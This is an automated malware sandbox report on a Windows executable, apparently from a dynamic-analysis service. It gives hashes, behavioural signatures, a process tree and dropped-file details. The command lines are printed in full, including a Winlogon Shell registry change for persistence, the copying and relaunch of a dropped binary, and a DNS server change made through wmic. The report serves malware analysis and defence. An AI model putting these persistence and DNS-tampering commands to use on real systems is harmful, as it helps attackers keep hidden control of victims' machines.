Analysis
max time kernel: 122s
max time network: 118s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 11/11/2024, 11:00
Static task: static1
Behavioral task: behavioral1
  Sample: dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe
  Resource: win10v2004-20241007-en
General
Target: dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe
Size: 800KB
MD5: 68e6c48eab8ee9681659d3d47d1c8442
SHA1: 0ce069304550e846c8ba47e3198d9c5a3980c26e
SHA256: dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee
SHA512: d8d32ef2d81ead9c13391738bae3368e48940dbf9c4a9c8e990ebf0f58d6d4a745f32c55472a9d704202b549954efed4ef306b2b4ad81596c6a16541118c5008
SSDEEP: 12288:1WUovH4E8fkLIJkqNIjqWahIKR/gsk0h97chCVhw3FdCe:1WUovLOqIJk8IjhKC077ch53y
Malware Config
Signatures
Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  Process: reg.exe
  Set value (str): \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Local\\Registry.exe,"
Executes dropped EXE (4 IoCs)
  PID 2316 Executable.exe
  PID 2644 Bootstrapper.exe
  PID 1268 Process not Found
  PID 2516 Registry.exe
Loads dropped DLL (9 IoCs; duplicate rows collapsed, count in parentheses)
  PID 2208 dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe (1)
  PID 1560 Process not Found (1)
  PID 2448 WerFault.exe (5)
  PID 572 cmd.exe (2)
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 8 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
  Processes (in order reported): cmd.exe, PING.EXE, cmd.exe, PING.EXE, reg.exe, PING.EXE, Registry.exe, Executable.exe
System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 5 IoCs)
  Adversaries may check for Internet connectivity on compromised systems.
  PID 2768 cmd.exe; PID 2772 PING.EXE; PID 572 cmd.exe; PID 1180 PING.EXE; PID 2012 PING.EXE
Gathers network information (2 TTPs, 1 IoC)
  Uses a command-line utility to view network configuration.
  PID 2784 ipconfig.exe
Runs ping.exe (1 TTP, 3 IoCs)
  PID 2772 PING.EXE; PID 1180 PING.EXE; PID 2012 PING.EXE
Suspicious behavior: EnumeratesProcesses (9 IoCs; duplicate rows collapsed, count in parentheses)
  PID 2316 Executable.exe (6)
  PID 2516 Registry.exe (3)
Suspicious use of AdjustPrivilegeToken (43 IoCs)
  PID 2316 Executable.exe: SeDebugPrivilege
  PID 1176 WMIC.exe (the following 20 tokens are each reported twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  PID 2644 Bootstrapper.exe: SeDebugPrivilege
  PID 2516 Registry.exe: SeDebugPrivilege
Suspicious use of WriteProcessMemory (50 IoCs; duplicate rows collapsed, count in parentheses; procid_target in brackets)
  PID 2208 dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe wrote to memory of PID 2316 [31] (4)
  PID 2208 dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe wrote to memory of PID 2644 [32] (3)
  PID 2644 Bootstrapper.exe wrote to memory of PID 2708 [34] (3)
  PID 2708 cmd.exe wrote to memory of PID 2784 [36] (3)
  PID 2316 Executable.exe wrote to memory of PID 2768 [37] (4)
  PID 2768 cmd.exe wrote to memory of PID 2772 [39] (4)
  PID 2644 Bootstrapper.exe wrote to memory of PID 2732 [40] (3)
  PID 2732 cmd.exe wrote to memory of PID 1176 [42] (3)
  PID 2644 Bootstrapper.exe wrote to memory of PID 2448 [44] (3)
  PID 2316 Executable.exe wrote to memory of PID 572 [45] (4)
  PID 572 cmd.exe wrote to memory of PID 1180 [47] (4)
  PID 2768 cmd.exe wrote to memory of PID 848 [48] (4)
  PID 572 cmd.exe wrote to memory of PID 2012 [49] (4)
  PID 572 cmd.exe wrote to memory of PID 2516 [51] (4)
Processes (indentation shows parent/child nesting)

PID 2208  C:\Users\Admin\AppData\Local\Temp\dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe"
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory

  PID 2316  C:\Users\Admin\AppData\Local\Temp\Executable.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\Executable.exe"
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

    PID 2768  C:\Windows\SysWOW64\cmd.exe
              cmdline: "cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\Registry.exe,"
              - System Location Discovery: System Language Discovery
              - System Network Configuration Discovery: Internet Connection Discovery
              - Suspicious use of WriteProcessMemory

      PID 2772  C:\Windows\SysWOW64\PING.EXE
                cmdline: ping 127.0.0.1 -n 38
                - System Location Discovery: System Language Discovery
                - System Network Configuration Discovery: Internet Connection Discovery
                - Runs ping.exe

      PID 848   C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\Registry.exe,"
                - Modifies WinLogon for persistence
                - System Location Discovery: System Language Discovery

    PID 572   C:\Windows\SysWOW64\cmd.exe
              cmdline: "cmd" /c ping 127.0.0.1 -n 44 > nul && copy "C:\Users\Admin\AppData\Local\Temp\Executable.exe" "C:\Users\Admin\AppData\Local\Registry.exe" && ping 127.0.0.1 -n 44 > nul && "C:\Users\Admin\AppData\Local\Registry.exe"
              - Loads dropped DLL
              - System Location Discovery: System Language Discovery
              - System Network Configuration Discovery: Internet Connection Discovery
              - Suspicious use of WriteProcessMemory

      PID 1180  C:\Windows\SysWOW64\PING.EXE
                cmdline: ping 127.0.0.1 -n 44
                - System Location Discovery: System Language Discovery
                - System Network Configuration Discovery: Internet Connection Discovery
                - Runs ping.exe

      PID 2012  C:\Windows\SysWOW64\PING.EXE
                cmdline: ping 127.0.0.1 -n 44
                - System Location Discovery: System Language Discovery
                - System Network Configuration Discovery: Internet Connection Discovery
                - Runs ping.exe

      PID 2516  C:\Users\Admin\AppData\Local\Registry.exe
                cmdline: "C:\Users\Admin\AppData\Local\Registry.exe"
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

  PID 2644  C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

    PID 2708  C:\Windows\system32\cmd.exe
              cmdline: "cmd" /c ipconfig /all
              - Suspicious use of WriteProcessMemory

      PID 2784  C:\Windows\system32\ipconfig.exe
                cmdline: ipconfig /all
                - Gathers network information

    PID 2732  C:\Windows\system32\cmd.exe
              cmdline: "cmd" /c wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
              - Suspicious use of WriteProcessMemory

      PID 1176  C:\Windows\System32\Wbem\WMIC.exe
                cmdline: wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
                - Suspicious use of AdjustPrivilegeToken

    PID 2448  C:\Windows\system32\WerFault.exe
              cmdline: C:\Windows\system32\WerFault.exe -u -p 2644 -s 1128
              - Loads dropped DLL
Network
MITRE ATT&CK Enterprise v15
Downloads
File 1
  Filesize: 463KB
  MD5: 7348784c1b2435bbfcf65e2b1a6a0fcc
  SHA1: e5e5cf58ca04c0b11f3468a3d13256ed1f9e6d47
  SHA256: 5ec00bf94260666f70facf9a2c7d16979dd5bad3737c23c17394337caffca282
  SHA512: a5d5b7a9117553e5ad4ec78e6deea1836bd9252d85dc254ea098210bf186b76c760227a44a032d6bb43408870a53ad52ec73566af73c1d5d9d067be446dd2ffa
File 2
  Filesize: 800KB
  MD5: 2a4dcf20b82896be94eb538260c5fb93
  SHA1: 21f232c2fd8132f8677e53258562ad98b455e679
  SHA256: ebbcb489171abfcfce56554dbaeacd22a15838391cbc7c756db02995129def5a
  SHA512: 4f1164b2312fb94b7030d6eb6aa9f3502912ffa33505f156443570fc964bfd3bb21ded3cf84092054e07346d2dce83a0907ba33f4ba39ad3fe7a78e836efe288